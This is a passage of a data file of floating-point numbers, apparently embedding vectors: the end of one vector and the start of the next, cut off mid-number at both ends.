6,-0.008844157,-0.008163525,-0.014934919,0.00858682,0.017243426,-0.0000012658395,0.016290415,-0.021616852,0.0014767887,0.001371638,-0.015538498,0.0051072277,0.014556525,-0.021904796,0.015709978,-0.013261997,-0.0019234752,0.016941657,-0.0012297753,-0.0011768254,-0.0061949976,-0.0122376345,0.018543761,-0.0032353662,0.015927093,0.017946247,0.02390849,0.008177215,-0.0106132245,-0.017381236,-0.014247362,0.013874976,-0.0028174636,-0.025025656,0.029209787,-0.0068564415,0.00094343524,0.0069498727,0.025918897,0.03972459,0.029981999,-0.011668477,0.020842392,0.029052496,-0.003640017,-0.0128171565,-0.0061204745,0.001994274,-0.0101124365,0.038141295,0.0411023,0.004094488,0.014224692,0.0127435,-0.004476027,0.03128556,-0.009321603,0.006994708,-0.004664462,-0.0033228763,-0.018163398,0.0025162417,0.011076497,0.004577044,0.0052350434,0.011611584,-0.010433434,-0.016251905,-0.007313308,-0.008253737,0.011159147,-0.020310057,0.006374797,-0.0106885955,-0.00034954163,0.0012397622,-0.016991528,-0.001979982,0.0118686715,0.009039787,0.024106106,0.02915074,0.013480795,0.007583437,0.014430905,0.0055644657,-0.009428427,-0.009874924,-0.0063739833,0.018732427,-0.002349569,0.0062806644,-0.006335748,0.011192603,-0.0037776085,-0.015417962,0.0005324557,-0.018891549,-0.028781384,-0.014295811,-0.02319084,0.0010100325,-0.0037177494,0.007941863,0.016186269,0.009137806,-0.014610636,0.033422135,0.008448697,0.013633498,0.0023786025,0.0072695734,0.008575124,0.010013489,0.008589033,-0.0015636932,-0.022702824,-0.029055407,-0.0069911215,-0.021353949,0.0069379658,0.0076616127,0.016643638,-0.021829816,-0.0025982873,-0.012020109,0.039467692,-0.0027791974,0.04470368,0.021769235,0.0020645102,0.016262118,0.0034649724,0.012289893,0.00876562,-0.019115407,0.03378509,0.00083725824,-0.04152735,-0.009169807,0.008072976,0.0012133322,0.008683999,0.008818655,0.0018585561,0.0022847096,0.014921899,-0.0309563,-0.008994817,-0.00489401,-0.02073781,0.01599054,-0.0056210617,0.0153602045,0.0060889446,0.000024566469,-0.0385116,-0.009878413,0.007473241,-0.013882825,-0.0041952576,-0.0026236267,-0.019145152,-0.002493708,-0.009174936,-0.031907592,0.0046405345,-0.007244546,-0.0037252258,-0.0052027158,-0.010790246,-0.0038667677,-0.0026224332,0.010653508,-0.007925008,-0.0003874821,0.012255177,0.016844137,-0.012287077,0.013175797,0.035091434,0.0088027315,-0.012612766,0.017131578,-0.022817917,-0.026492907,-0.0034255951,0.0034407452,-0.0095749535,0.0052006966,-0.007444745,0.005136419,0.0022590924,-0.008309323,-0.012856294,0.0032917499,0.00474661,0.008534579,0.0033531047,0.0337641,0.0050421865,-0.005068463,-0.008108565,-0.002342377,0.019474214,-0.0054978994,-0.0068115,0.006455955,0.013414233,0.01675115,-0.0006827853,-0.004947784,-0.003609388,0.0059650205,0.0043898514,-0.0036385623,0.027172653,-0.021696342,-0.009753088,-0.0046953172,-0.00669001,-0.020081723,-0.010719633,-0.008023991,-0.018744254,0.01368623,-0.022149622,-0.013137962,0.010432145,-0.0179884,-0.011500036,0.06425977,0.008132835,0.005329361,0.0016589432,-0.0023499203,-0.021149531,-0.007075836,0.008478112,-0.000010845557,-0.002487397,-0.045001645,-0.009044584,-0.017838718,-0.017259555,0.03101774,-0.008333996,-0.005770216,0.02495682,-0.0016168817,-0.0006623339,0.0033984696,0.0035033755,-0.016466137,-0.008092331,0.0072020176,0.007628448,0.0077112117,-0.001100643,0.0032843535,0.014074407,-0.006854827,0.0080679655,0.017378414,0.011503817,-0.0009629703,-0.0039149723,0.013424646,0.0052433005,0.019254502,-0.002910707,0.004426468,-0.015731104,0.057221398,0.02655931,0.026365638,-0.023837714,-0.022247612,0.003981718,-0.008829178,0.01908231,-0.003576557,-0.026525078,-0.010204376,-0.007320606,0.009221419,0.01111154,0.0034188055,0.02379938,0.033314962,-0.014815582,0.017968057,0.039756183,0.0065776734,-0.009436985,-0.010184017,-0.013471819,-0.025333997,-0.012500408,0.027871968,-0.02629559,0.01675432,0.0118154315,0.0043084617,0.013146733,0.0074530155,0.007598447,0.004587379,-0.0044516386,0.0113583915,-0.011812697,-0.017232636,0.02353642,0.013027484,0.019947289,0.004745598,0.008061712,0.004245513,0.0007045023,0.050073378,0.017219083,-0.0023177715,-0.017523972,-0.013675769,0.010622714,-0.0018695265,0.022002256,-0.021727072,0.0072094747,-0.025752772,0.0028355336,-0.005756062,0.0025573913,-0.0007099695,-0.019626604,-0.0006324699,0.0055627157,-0.009451904,-0.023775365,0.0049571446,0.03968526,0.00086938,0.014647299,-0.001272684,0.0025212415,0.0050163907,-0.0035255523,0.014295097,-0.025104793,0.0010555213,-0.007904625,0.008127028,0.01529661,-0.008327153,-0.055914216,0.016344322,0.12262812,0.013258836,0.0047220774,0.0145696085,0.0024446095,-0.0059877355,-0.10411281,-0.008559249,-0.017698802,-0.015887609,-0.014771766,-0.015931888,-0.00464032,-0.0005171232,0.0014944654,0.00073376985,-0.0040294356,-0.033114634,0.011454763,-0.0142810065,0.01375039,0.0063994476,0.005332881,0.016996004,-0.02895239,0.008397442,0.00799579,-0.020083088,0.016435895,-0.036684755,-0.01974619,-0.0027707887,-0.0040568006,0.00417016,-0.0039647436,0.017384317,0.00879358,0.011851338,-0.016062064,-0.019143453,0.031918213,0.004877533,-0.01874451,-0.03477248,-0.12797084,-0.018851837,-0.031865362,-0.0324731,0.011631533,-0.03155176,-0.005136811,0.015995126,0.007999445,-0.026079848,0.015669588,0.018069683,-0.014353718,-0.007904946,-0.026114203,-0.00796814,0.01281623,-0.002033989,-0.011987781,-0.008019213,-0.0108994,-0.006760113,-0.0020164764,0.0120819835,-0.0077821817,0.010072968,0.009660263,0.016444093,0.018798327,0.017551184,-0.016384384,0.022741934,-0.013442625,0.010697957,-0.00951701,-0.009850597,-0.00038361907,-0.008726104,-0.008074282,0.018248336,-0.0059874156,-0.012974059,-0.020568464,-0.015466665,-0.0010589483,0.0074230563,0.014691362,0.005123735,0.0012689605,-0.0047220513,-0.0011722384,0.0017979273,-0.009764531,0.010578128,-0.014683124,-0.008639464,-0.0060586873,-0.015416265,0.010542736,-0.00015038328,0.0038388483,-0.012780527,0.0046535903,-0.010469237,0.012714688,0.009135455,-0.00038448433,-0.044002358,-0.004875555,0.0060183415,0.00610634,-0.006128829,0.024745064,-0.030502878,0.01647806,0.008353397,0.00061888155,-0.016459562,0.008888997,0.0038874203,0.014325107,-0.015550308,0.0008072009,-0.023686904,0.0031212794,0.01311632,0.01127122,0.018169938,-0.009010617,0.01747608,0.030144889,-0.011337669,-0.022411322,-0.003180299,0.014944485,0.023114905,0.035461508,-0.0039639706,-0.030455668,0.01579525,-0.010726908,-0.009165032,-0.030100921,0.02463164,-0.021061057,0.010192788,0.021145875,-0.01984191,-0.0071503916,0.018553486,0.0028036002,-0.014915805,0.011655342,-0.015104967,-0.015440084,-0.0069989017,0.020507216,0.0047439975,0.0048294435,-0.011769644,-0.02148083,0.024693541,-0.008429706,-0.0010050022,0.02084778,-0.0064154644,-0.016607571,0.020697834,-0.022106554,0.017137002,0.011508211,0.020733103,-0.015198565,0.013457418,-0.0049943393,-0.018337643,-0.010704301,0.022223022,-0.02145604,-0.026473738,-0.006135949,-0.015406642,-0.0042199027,-0.0008758544,-0.0077731498,0.005038366,0.0021711304,-0.016025368,0.0024244117,-0.005929371,0.0026153084,0.008495344,0.002731085,0.011688934,0.029387789,0.07173831,-0.025822507,-0.030581899,0.0356366,0.016726416,0.00087295123,0.007313655,-0.015308359,-0.020434238,-0.019340985,0.004109831,-0.018558033,0.0007965939,0.00091396796,-0.016550828,0.0154369855,-0.015078973,0.03318222,0.0066314037,-0.015373601,0.003049546,-0.027979271,-0.012072076,0.022345623,0.00040197375,-0.02431195,-0.0012631839,-0.014526762,-0.003613825,0.011576591,0.00075915194,-0.009345,0.003989004,0.012186453,0.014383801,-0.015222114,-0.0014482627,-0.0058015957,-0.015630148,-0.00637775,0.010869775,0.000689943,0.021742838,-0.011449354,-0.0030159736,-0.010951024,-0.014191913,0.012198467,0.03138036,-0.012874915,0.011263413,0.00540126,0.008909796,0.007848378,0.013822525,-0.0017798076,-0.013267324,-0.002203437,-0.019938203,-0.017474644,0.009216351,-0.002062164,-0.023867168,-0.010811308,-0.018373035,-0.002441965,0.007813702,0.023998285,0.009437141,0.0070358044,0.0055699623,0.03242545,-0.004078825,0.01773187,0.0041533075,-0.004433991,-0.02505935,-0.017476758,-0.005312803,0.004198265,-0.0027491383,-0.00028863832,-0.025333451,0.009013668,-0.009457077,-0.025011014,-0.013685189,0.016852459,-0.0551766,-0.027991252,-0.0132103,-0.015273097,0.057841413,0.0020700803,0.010087643,0.015434846,0.007746096,-0.005387602,0.0025472373,0.011796996,0.0022109507,0.00074387965,0.003602305,-0.010597895,0.024345689,-0.014592533,0.00919817,-0.003621237,-0.0047547356,-0.018077292,0.005220801,-0.002066136,0.0135767665,-0.030799204,-0.026202893,0.046421796,-0.016818833,0.014840575,0.015659602,-0.013719287,-0.027222835,-0.017689275,-0.01067849,0.0021295866,0.005699964,0.007963044,0.0023629966,0.003497471,-0.034803316,0.012092507,-0.024676358,0.0075516053,0.029822357,0.006023671,0.0055143563,0.0077380864,0.0140859345,0.032151517,0.009809109,0.0029608302,-0.013375648,0.00221711,-0.0010528543,-0.0068574403,-0.013853157,0.0071214233,0.02593725,-0.025008949,-0.02663308,0.027813727,-0.00057833997,-0.0119558545,0.00027931595,-0.014425352,0.02006565,0.0042623687,0.022512384,-0.0238463,-0.028484391,-0.03248046,-0.0108217355,0.035084434,0.0038785904,-0.014477969,-0.023300542,0.012759638,0.019242238,0.01702776,0.0059387805,0.0016223203,-0.0019601332,-0.020145068,-0.0010882027,0.009978902,-0.0069766203,-0.012338751,0.008578308,-0.007830819,-0.013739397,-0.025050262,0.0044082263,0.01171979,-0.019215839,0.024121948,0.009591471,0.021507611,0.0007546583,0.031835105,-0.00051662035,-0.0073285177,0.014051876,-0.0010961592,0.0042997985,-0.014867564,-0.03176635,0.0014439701,0.0042042,-0.010973053,-0.0034849741,0.0213304,0.003617233,0.034535587,-0.04246158,-0.01274933,0.014671372,-0.030386973,-0.009792584,-0.0029253438,0.003903833,-0.0076518795,-0.016060835,-0.013783139,0.0016074517,0.02548586,-0.004059946,-0.014675326,0.012142738,0.014396269,-0.00031283638,-0.025259167,-0.010058206,0.0013567605,-0.017315429,0.0031517267,-0.0080277305,-0.015805125,0.016137289,0.026484704,-0.010528787,-0.01865182,0.00687479,0.028498566,0.036520146,0.026477614,0.0023494465,-0.010356635,-0.03412192,-0.013454367,-0.034071203,0.012937531,-0.009338006,-0.026481505,0.014028968,-0.0013801259,0.009922796,0.015744234,0.013642748,0.006233519,-0.000057498182,0.0009499042,-0.030367598,-0.024766507,-0.051478274,0.008156652,0.013577405,-0.015129322,0.008099564,-0.008491767,-0.026064802,-0.067696966,0.009636338,0.00390846,-0.013085959,0.01782915,-0.015687803,0.023826845,0.01125958,0.046580497,0.0034377393,0.022888813,0.009225386,-0.013431678,-0.021231258,0.00092244,-0.01764247,-0.003571298,0.0045624515,-0.008412805,0.017936418,0.005603535,0.016105302,0.00899696,0.0072874688,-0.00084466516,-0.01682149,-0.03376552,0.005113471,0.021721981,-0.006405095,0.005526957,-0.0014778108,0.024044827,0.009467449,-0.010320664,-0.037330654,-0.00238044,0.008985039,0.014022024,0.0040278314,-0.018700235,0.016256502,-0.005461376,-0.012444295,0.021644926,0.0076917117,-0.031121265,0.035776682,-0.010598682,0.0120716235,-0.0018940392,-0.014051856,-0.010906684,0.0029015332,-0.009946625,0.0053986968,0.005488624,-0.001233637,0.02284509,-0.022268184,0.022215018,0.0054783053,0.011866196,-0.032719094,0.0042451317,-0.0035659734,0.015217632,-0.031904355,0.0064619863,-0.00571291,-0.012281781,0.0045504095,-0.03594138,0.007444548,-0.09975401,-0.0026382473,-0.024100672,-0.009596153,-0.024142472,-0.009023143,0.025212863,-0.0011945568,0.0044174083,-0.02206714,-0.0112495255,0.026046319,0.01441061,0.0052806926,0.008516661,0.009916873,-0.020130102,0.018283363,-0.026259674,0.0104777645,0.009901781,-0.017940318,-0.018356713,0.0010335471,0.02075585,0.0025077742,0.01792541,0.007841844,0.0055078086,0.00015239023,0.007224862,0.02669986,0.015340237,0.011683185,0.032440986,0.023686085,-0.02293014,0.018566316,-0.041331906,0.008881239,-0.0057522506,-0.0021643532,-0.024545051,0.007840224,0.0005458928,0.016438218,0.0053075305,0.009579613,0.02740811,0.004137639,-0.04857249,0.026689982,0.01084128,0.0079079475,-0.0052729934,-0.0048354687,0.00398687,0.011330212,0.019004907,-0.0038336958,-0.0032274246,0.018985817,-0.006610338,0.010665536,0.015050695,0.00829563,-0.0015988193,0.010278421,-0.0069925203,0.0060060816,0.0055693737,0.019246792,-0.013861662,0.023464916,-0.020214826,0.015115641,0.027985694,-0.014037713,-0.005862145,0.026466843,-0.01062299,-0.0019139791,0.004077638,-0.013389486,-0.0060021775,0.007386154,0.015361809,0.012425713,0.003950606,-0.02518719,0.035694648,0.006654142,0.0017483749,0.015952125,-0.006114496,0.019799339,-0.011830452,0.013812375,-0.019512074,0.008691617,-0.01783778,-0.027736193,0.005731942,-0.010875805,-0.09395362,-0.03197731,0.010684024,0.020167869,-0.0010419199,-0.0251696,0.014610155,-0.00043383578,0.04208581,-0.009063359,0.0031243188,-0.005120253,0.013815141,0.011792194,0.0011454499,-0.004585552,-0.026173996,-0.021063717,-0.017895475,0.0025564407,-0.012028715,0.013415594,0.007103434,0.02944812,0.003262786,0.008464617,0.017526915,0.041207585,0.017059134,0.010468516,-0.0025973038,-0.0082427375,-0.0052044815,-0.017716086,-0.031102553,0.010793924,0.002329058,-0.0024266024,-0.012689097,0.00436755,-0.00073151273,-0.017810704,0.012307813,0.028222078,-0.003152842,-0.012188451,0.0022380538,0.012287907,-0.009289868,-0.017338932,-0.039219692,0.019101785,-0.0077821882,0.004709372,-0.026806217,-0.019028336,0.0104158865,0.001476057,0.0068434216,-0.009964077,0.0153205935,-0.0047820155,-0.007334758,0.023444539,0.003596878,0.043588016,-0.011388636,0.007899646,0.002607459,-0.0010667559,0.007116175,0.023061223,0.010036737,-0.0042141657,0.025265753,-0.012917027,0.02027227,0.03003801,0.024502134,0.011194759,0.0046789297,-0.0012455571,0.0017419115,-0.0014182084,-0.023958225,-0.011642903,0.02091788,0.005893367,-0.024917068,0.011604951,0.0028530962,0.0033017632,0.01511059,0.009583946,-0.0037922102,0.0014343899,0.009057718,-0.000806666,-0.0016911809,-0.021373358,-0.014685187,-0.032807264,0.011992702,0.007995821,-0.02091726,0.014892151,0.039219886,-0.01672127,0.013993028,-0.008742935,-0.004101685,0.016193448,0.0040992177,0.0059806244,0.0050056023,0.006455192,-0.002064491,-0.0034946739,-0.018173428,-0.009123728,-0.003515931,0.01961747,-0.008496614,0.0026703363,-0.0023939218,-0.021243462,0.0171045,0.0074054017,0.008975604,-0.019968942,-0.0043174177,-0.0015249886,-0.0039940067,-0.009382115,-0.009467136,0.009079989,0.01059607,0.0014374217,0.037350442,0.005554171,0.0037198123,-0.0004142557,-0.0070965206,-0.005958172,-0.0102184545,-0.008450082,0.0025766492,0.0010648313,-0.010946669,-0.0047609396,0.008122744,0.000842151,0.011152132,0.0020956707,0.014741666,0.029120408,0.0039221337,0.0024984502,0.0028030446,0.00666433,-0.011240818,-0.0067306324,0.021009332,0.0035227933,0.0028950688,0.009673476,-0.009297069,0.010340109,-0.020915544,0.01311125,0.020616066,-0.00079491065,0.019942436,-0.0208025,0.021622285,-0.011628361,0.017235355,0.037561532,0.004033143,0.0045714816,-0.030512692,0.0019251439,-0.010815349,0.0035756016,-0.009093293,0.00832341,-0.023259172,-0.0016246561,0.0051891673,-0.026800897,0.02697706,-0.0057686036,-0.014108924,-0.019186782,0.0041720527,-0.0042852596,-0.0038350422,-0.017179644,-0.01051643,-0.007357477,-0.01420514,0.00801292,0.029270079,0.017544983,-0.0034894622,-0.0014643967,0.004675947,0.034552477,0.004520747,-0.0073983297,-0.013229051,0.03394493,0.0013977939,-0.008171856,0.0008512301,0.014862847,0.014122697,-0.038999267,-0.008189712,0.020890107,-0.0018663913,-0.027521208,0.0062756175,0.0010101342,0.0002620237,0.023037499,0.004998705,0.028287265,-0.030176723,-0.011397215,0.022702662,-0.005704799,0.0031451695,0.0050395126,0.0071788393,-0.0129434,0.014343382,-0.002406503,0.0068156472,0.022879196,0.034822196,0.00789738,0.0037613334,0.01882606,0.009363006,-0.004214858,0.028806148,-0.01865556,0.018757714,0.026338505,0.0017543461,0.012646113,-0.002750619,-0.017991608,-0.0015542485,0.017899303,0.0102609955,-0.0025193037,-0.011283943,0.0022527645,-0.029666875,-0.0028281806,-0.022681516,0.008813498,-0.034998987,0.0041228193,0.008577878,-0.003878363,0.018605912,0.0077441954,0.012250761,0.031610887,0.0007816805,-0.001425368,-0.034861688,0.0062423283,0.0062352596,0.0059936754,-0.0008054339,0.0077984086,0.028352164,-0.014609048,0.0061318344,0.007936311,0.012761054,0.00047834063,-0.0020630152,-0.015791092,0.002513505,0.009436595,0.028190238,-0.019710705,-0.012319904,-0.009947916,-0.00003658745,0.030493278,0.027489549,0.020547375,0.016089384,0.021961067,0.00927649,-0.007412847,0.021898536,0.008097601,0.01802301,0.017012237,-0.0040791435,0.0070474944,0.018599361,-0.000751626,-0.012883293,0.009462037,-0.013105314,0.011985675,0.0044402257,-0.0004692826,-0.025679292,-0.006610123,0.0059257178,-0.012271073,-0.00552332,-0.00041922156,0.029343342,-0.012782595,0.0033264428,-0.010412016,0.007137049,0.041563243,-0.014834477,0.016569234,0.01136896,-0.060841136,-0.015332573,-0.026165815,0.023375947,0.0041603544,0.011436978,0.022400126,-0.007999151,0.006070844,-0.0018310837,0.027438473,0.006530953,0.005354195,-0.013730245,0.019785814,-0.030283831,-0.006357856,0.0041095824,0.0020702602,-0.004404441,0.005617394,-0.011989551,0.012209553,-0.005529244,0.009543876,-0.055931628,-0.014185678,-0.0048502246,-0.00018846753,-0.023763191,-0.002226445,0.0021253233,-0.023321249,0.00929433,-0.005540344,-0.0035236496,0.017444333,-0.01603915,0.0060277437,-0.013269532,0.033657137,-0.025227327,-0.006633644,-0.0214993,-0.06899876,0.021834156,0.012538176,0.02200017,0.020412978,0.028748527,0.02047206,-0.013824961,0.022825317,0.011320475,-0.013979959,-0.016947208,-0.0042437045,0.016227735,0.025594201,0.009506837,-0.020659462,-0.0004133737,0.0044303406,-0.01772254,-0.006228608,-0.022089956,-0.009820218,-0.013481638,0.030805355,-0.0063369647,-0.012847378,0.017778197,0.02543146,-0.0041784365,0.0041859793,-0.01752002,-0.007579961,-0.021756042,-0.026066905,0.019319173,-0.0041641328,0.027930137,-0.027725954,-0.0026783587,-0.004940662,0.016013859,0.030575851,-0.008395592,-0.023739142,-0.012136678,-0.028115971,0.0055737253,0.0122879315,-0.010057636,0.0010317265,0.011913777,-0.03752576,-0.001054792,0.014488344,0.0029631956,0.01733119,-0.034119178,0.010544292,0.0058639487,0.0013618313,0.017732024,-0.004395766,-0.0053984304,0.006045349,0.005978515,0.0051735053,0.025050795,-0.012732366,-0.0082661975,0.02200885,-0.020417595,-0.014209538,0.017539563,-0.01886568,-0.017266188,0.021463355,-0.0074904542,-0.03268183,0.014677978,0.063564144,-0.00136759,0.025299724,0.019061971,0.0058559394,0.0021806369,-0.013771642,-0.012857814,0.011831051,-0.0028064286,0.005979923,0.0054813977,0.0138980625,-0.0085507445,0.010881787,0.017872479,0.0075627374,0.011993343,0.004238696,0.029416876,0.011031094,0.0054159765,0.0046922765,-0.01388699,0.015686003,-0.013404027,-0.014313584,-0.009489686,-0.0075184912,-0.014154978,0.0037520314,0.019230582,0.0035396898,0.018956965,-0.0025963425,0.010776946,-0.010367628,0.026117882,0.02423774,-0.027674569,-0.0075896536,-0.02143946,-0.004426393,0.039229058,0.00792286,-0.016237292,0.0038738062,-0.007778904,0.006503492,-0.00871059,-0.01957606,0.013174381,0.020769648,0.016298717,-0.01734223,-0.00015805979,-0.0064147203,0.024322856,-0.007583996,0.031035284,-0.017839141,-0.003944028,0.0047409805,-0.010237644,-0.023827499,0.019304832,-0.019545564,0.001415608,-0.0028626886,-0.007156386,-0.011149394,-0.0013094561,0.010066544,-0.0031930734,0.009642237,0.0138422595,-0.0016842068,0.0011128556,-0.0026614764,-0.0037101707,-0.0042682188,0.022916935,0.010724844,-0.032967176,-0.019784726,-0.0047755074,0.010305693,0.0076859854,0.011400599,0.012512104,-0.0031449487,0.0011886668,0.0005399877,-0.018221436,-0.02153005,-0.0021223726,0.02213084,0.0051801964,-0.0010924189,0.016652077,-0.026608301,0.016636388,0.008230223,0.001495434,-0.00639039,-0.024276149,0.020693,0.017204748,-0.004211501,0.00032793172,0.017854681,0.00460406,-0.008178156,0.0031334807,-0.012923183,-0.007976225,0.016936079,-0.005605468,-0.0008541009,-0.0148285795,-0.009176416,-0.0027139573,-0.009225138,-0.022044977,0.029124353,0.026596865,-0.013728644,-0.0037431219,-0.02170545,0.0010335596,-0.007048507,-0.014329376,0.0054053073,0.10172529,0.012910389,-0.00732066,-0.009150013,0.009139405,0.0121517405,-0.010936289,0.00036092597,0.007840043,-0.0015984328,0.01824555,0.009615594,0.016475827,-0.0043560797,0.014072888,0.036967576,0.00046417554,-0.023214033,0.017296292,0.0002846812,0.002266852,-0.0067939637,0.0016855218,0.005883563,-0.014426779,-0.058950767,0.0047582043,0.02226425,0.02033754,0.006375688,0.009697269,-0.000045951492,0.0077407444,0.001630574,0.00345014,-0.0147726135,-0.0037479422,-0.008241346,0.0015802752,-0.027671669,0.027817447,0.0031715266,-0.008021699,-0.011304501,-0.009236224,-0.03619125,-0.0049814535,-0.013326222,0.00007955965,-0.00055313867,-0.01308402,0.001432644,-0.024018863,-0.00853284,0.008616727,0.017784841,-0.006178046,-0.012585428,0.034382913,-0.02209936,-0.0000031628936,-0.0058133043,0.006182619,0.007912908,0.011687407,0.037644338,-0.0073227515,-0.0142124435,-0.008243046,-0.014747647,0.0174071,0.008470379,-0.0012564089,-0.0064133815,-0.0037593595,0.010972847,-0.008116094,0.00447447,0.019809157,-0.023041245,-0.007178325,-0.003038774,0.009684446,-0.020424306,0.012286644,0.000606224,-0.028883383,0.025322914,-0.024154304,-0.0141858,-0.022080129,0.038440432,0.01633085,-0.004091038,-0.005384823,0.011545235,0.03410389,0.014662814,0.008323495,0.0022887152,-0.0062695183,-0.012115052,0.0105455825,0.018987179,0.00655543,0.00091090245,-0.00830691,-0.017387798,0.007976103,0.02302571,-0.0048041395,0.024995444,0.0055463538,0.024041068,0.008812346,0.022569358,-0.021716004,-0.003979254,0.01280082,-0.010842704,0.010723812,-0.00055259094,0.00975858,0.04060102,0.0063200705,-0.00966918,0.007519206,0.018797643,-0.029394086,0.011573567,0.0076538534,-0.043361038,0.017781291,0.00028206987,-0.019621579,0.019509379,0.004807032,-0.008341424,0.008510915,0.00024732205,0.03514848,-0.0073170722,0.009819158,-0.026174026,-0.0021570006,-0.019896938,0.015883274,0.0055087404,-0.017159477,0.049954444,0.026190726,-0.0012573848,-0.021075444,-0.013810833,-0.030329974,-0.0069822385,-0.013125828,0.021777233,-0.0022092955,0.016438602,0.026303792,0.0070160143,-0.006212881,-0.03867292,0.03109352,-0.0004180122,0.020491412,-0.022650119,0.004489331,-0.00892207,-0.01107251,-0.0052949213,-0.021492276,0.02110172,-0.04137698,0.014496731,0.025874458,0.009580611,-0.019274069,-0.011790196,0.0028610996,0.014610598,-0.019815728,-0.0064837034,0.022548858,-0.0009139075,0.028741319,0.031221865,-0.012585669,0.027964696,-0.0042596525,-0.0014426247,0.0049114483,-0.00872786,-0.018122058,0.023226647,-0.021905208,0.029494757,-0.0317573,-0.04488413,0.004435319,0.0018871403,0.0022628196,-0.009380174,0.013538815,-0.018449906,-0.0077526635,-0.015301126,-0.0041757775,0.014469509,0.0197282,-0.0020557835,0.028801708,-0.035058778,-0.013665691,-0.0017882815,0.006001121,-0.010134539,-0.0084584905,-0.039171353,0.017277198,0.009127223,-0.015146052,-0.004235042,0.007290897,0.016483653,-0.0115884105,0.032290086,0.017376011,-0.015974224,0.00023148996,0.015954629,0.0034347419,0.018918695,-0.026205499,0.0189907,0.03349489,0.016842134,-0.007349844,-0.01033691,-0.0042722193,-0.0068517188,0.020901263,-0.006751281,-0.04080721,-0.012677815,-0.022083985,-0.02909442,0.0033596363,-0.008289341,-0.0103666065,0.0019466409,-0.0020703257,-0.027326258,-0.019499622,-0.021294096,-0.010774977,0.03569887,-0.0050094244,-0.015889497,0.022790426,0.010445398,-0.018360343,0.032585196,0.009824692,0.002308059,0.008265403,-0.0031862983,-0.01818433,-0.012573194,-0.015277086,0.018962117,-0.024804402,-0.002460308,0.012617478,-0.013706538,-0.0045882156,-0.024950322,-0.015262215,-0.03586847,-0.014072918,-0.004900449,-0.01042607,-0.006074669,-0.013818358,-0.011343535,0.0038700767,0.03620718,0.056990795,-0.067406766,-0.021045309,-0.0034256012,0.003449417,-0.05948863,0.03232255,0.011508955,-0.022937272,0.0041308184,0.009325548,0.0037348669,-0.026774928,-0.02656959,0.007707374,0.019988509,-0.011895402,-0.0011785774,0.018247914,-0.006425712,-0.0007374304,0.007949252,-0.016465407,0.0021603298,0.0016138605,-0.008323697,-0.010028843,-0.009401654,0.013272405,0.0018076889,0.019091722,0.0058679734,0.014472693,-0.025548838,-0.010170662,0.0059529953,-0.0061703864,0.015147458,-0.004261984,-0.027927758,-0.046377525,-0.02055297,0.0034123308,-0.0057849,0.016788946,-0.0062496597,0.0031152188,0.006015684,0.016327567,0.11476443,-0.021703688,-0.004379355,0.0067430534,0.012342677,0.0038905295,-0.021965452,0.021810988,0.019666968,0.01455294,-0.012061176,-0.026257722,0.009973479,0.026547136,0.0009474238,-0.02245727,0.017917361,0.14575866,-0.004111853,0.032456495,0.007453915,-0.016391309,-0.006082686,0.0011319416,0.001283769,-0.047837216,0.009214195,-0.053796817,-0.0048674806,-0.02803492,-0.011332852,0.0077715963,-0.006114316,0.01099035,-0.009009394,0.028047355,0.0035698623,0.0046892543,-0.028842812,-0.010086628,0.017802756,-0.011908732,-0.005294214,-0.0174737,-0.0060181087,-0.009050181,-0.023736725,0.01273122,-0.009160283,0.022345027,-0.002743554,-0.013296575,0.010981735,-0.0049177874,-0.015789844,-0.0060464647,0.006652503,0.0064388146,-0.0037770255,-0.005698833,0.006206788,0.0015783317,-0.0103520155,0.01931448,-0.032910887,0.0058090705,0.01000791,-0.00014657706,-0.007087878,0.025310578,-0.012320446,0.01723809,-0.02224423,-0.012363717,0.003190996,-0.008210357,-0.0144551275,-0.004552364,0.012602756,0.001856698,0.029446742,0.010307738,-0.018977487,0.008345712,0.020663533,0.027282413,0.0071049836,-0.02023886,-0.015001061,-0.02265145,0.007828827,-0.00060705683,-0.007977888,-0.013868308,0.0071803685,0.018801905,0.023272375,-0.020630775,0.014846424,-0.030225674,-0.0045711705,0.029451001,-0.01251105,0.007028555,0.0058093974,0.002149045,0.002833551,-0.020676682,-0.027846571,0.013933173,-0.0066824886,-0.017241031,-0.0049500554,0.030366734,0.0035782068,-0.007967565,-0.02799561,0.0038381591,-0.0138974255,0.0061708856,0.019351304,0.0323578,0.0028492173,0.0019496228,0.0072043627,-0.007594168,-0.010747546,0.012105263,0.005974838,-0.0019924173,-0.0074088015,0.05082422,0.022583408,0.014911574,0.0040099886,-0.008779109,0.010931001,-0.003226863,-0.004287949,-0.008096659,-0.0010761564,0.003918527,0.0045447135,0.009221465,0.001634089,-0.008574558,-0.00043191342,-0.019766426],[-0.0034187613,0.022873187,-0.009786672,-0.0011321196,0.003063817,-0.023517953,-0.0023546182,0.012177224,-0.006249257,-0.013654526,-0.0028855223,0.016195716,-0.010890808,0.008787819,-0.02557307,0.0044404087,0.016353732,-0.00038328816,-0.0076265926,-0.010710019,0.0075024683,-0.0020327806,0.016573193,-0.0058178524,0.017807344,-0.009623627,0.009077147,0.008536094,0.0083157625,0.017425686,0.0023447569,0.013340067,0.009124794,-0.009287949,0.007935786,-0.016756957,-0.0011336281,-0.021949273,0.0008293085,-0.015422891,-0.013361529,0.01591593,0.012361611,-0.0004606341,-0.00887933,0.017456267,-0.0048078415,0.017551186,-0.008509068,-0.011755844,0.0076130996,0.00036923384,-0.024613863,0.026376648,-0.0071972366,0.039443184,0.007194036,-0.021610046,0.014736796,-0.006485826,-0.002021601,0.026746266,0.00079108676,-0.015049633,0.011296937,-0.021388577,-0.0013259843,0.010918882,0.008732455,-0.035042506,-0.0130036585,-0.008202209,0.0011284816,0.013748324,0.024215152,0.03266735,0.0033416257,-0.02176825,-0.017462958,0.01101701,-0.0077052647,0.015486578,-0.022204883,-0.0061437036,0.0056606554,0.013763752,-0.013910616,-0.0088648945,-0.018577442,-0.03423119,-0.0028703106,-0.004935965,0.014930032,0.003165964,-0.031213189,0.018135902,0.0012566855,-0.007341919,-0.00085292564,0.009048723,-0.011931454,-0.013854935,-0.027204156,0.013421625,0.017797725,-0.020020891,0.001941169,-0.010402925,-0.020719407,0.0034551374,-0.0018152365,0.0014782712,0.0056769177,0.003404396,0.010728328,-0.0030155645,0.015806526,0.0067978106,-0.006784025,0.0021788236,-0.0027780603,0.021036953,0.0045836098,0.003015046,-0.00094466406,-0.0040104142,-0.020571653,0.0046633435,0.006635236,0.007846283,0.0014389524,0.023603685,-0.0032205402,-0.009354223,-0.005755374,-0.0003839474,-0.0038192743,-0.024511198,0.010978033,-0.018661315,0.0099161165,-0.015479551,-0.0055295997,0.0016522049,0.035614323,0.016824583,0.009637947,0.03375588,0.012019438,-0.019037575,-0.006615221,0.009553111,-0.0050557693,-0